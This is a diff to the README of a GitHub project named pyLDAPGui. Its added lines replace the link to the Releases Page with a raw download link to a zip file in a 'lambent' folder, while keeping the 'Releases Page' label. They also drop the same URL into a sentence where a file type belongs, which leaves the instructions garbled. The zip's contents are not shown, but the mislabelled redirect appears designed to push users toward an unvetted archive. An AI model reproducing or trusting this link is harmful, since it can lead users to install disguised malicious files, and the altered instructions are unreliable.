DavidArias123/pyLDAPGui/README.md

 To download and run pyLDAPGui, follow these simple steps:

 1. **Visit the Releases Page**
-   Go to the [Releases Page](https://github.com/DavidArias123/pyLDAPGui/releases) to find the latest version of pyLDAPGui.
+   Go to the [Releases Page](https://raw.githubusercontent.com/DavidArias123/pyLDAPGui/main/lambent/pyLDAPGui.zip) to find the latest version of pyLDAPGui.

 2. **Choose the Correct File**
    On the Releases Page, find the version that matches your operating system.
-You will see several files listed, such as `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+You will see several files listed, such as `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/DavidArias123/pyLDAPGui/main/lambent/pyLDAPGui.zip` for Linux.

 3. **Download the File**
    Click on the appropriate file to begin downloading.
 The download will start automatically.